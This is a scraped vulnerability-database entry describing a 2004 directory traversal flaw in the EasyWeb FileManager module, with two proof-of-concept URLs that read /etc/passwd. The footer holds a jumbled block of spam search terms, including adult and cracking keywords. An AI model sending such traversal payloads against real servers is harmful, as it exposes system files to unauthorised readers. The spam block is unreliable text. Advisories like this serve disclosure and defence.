about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , EasyWeb FileManager Module Directory Traversal Vulnerability


Title EasyWeb FileManager Module Directory Traversal Vulnerability
Published 2004-07-23-12:00AM
Updated 2004-07-26-02:50PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to <sullo@cirt.net>.
Vulnerable  EasyWeb EasyWeb 1.0 RC1
Not Vulnerable  
Code   No exploit is required.

The following proof of concept is available:
/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc

/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 19:32:14 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Anna sexi free xxxin kabel koffi daily indi Form hao566.cn celebrity www.blog-m jooma Crack Data news for c www.kingaw 0.93 Crack Data www.top-po nayan thar  WWW.SEXYWO Crack 20 maxcpm.inf SEX VIDEOS Sexwallpap Mobile sex ibw.com SEX VIDEOS Nth www.cleme. Sony Vaio WWW.PHONER WWW.18.TO1 handjob youprne WWW.18.TO1 lsass mailman+2. www.asspor www.vip163 sexi movis t691t download s program/mo ekandal se APACHE ROO www.guzw.n ms xp 1835 memory Apache htt kavya madh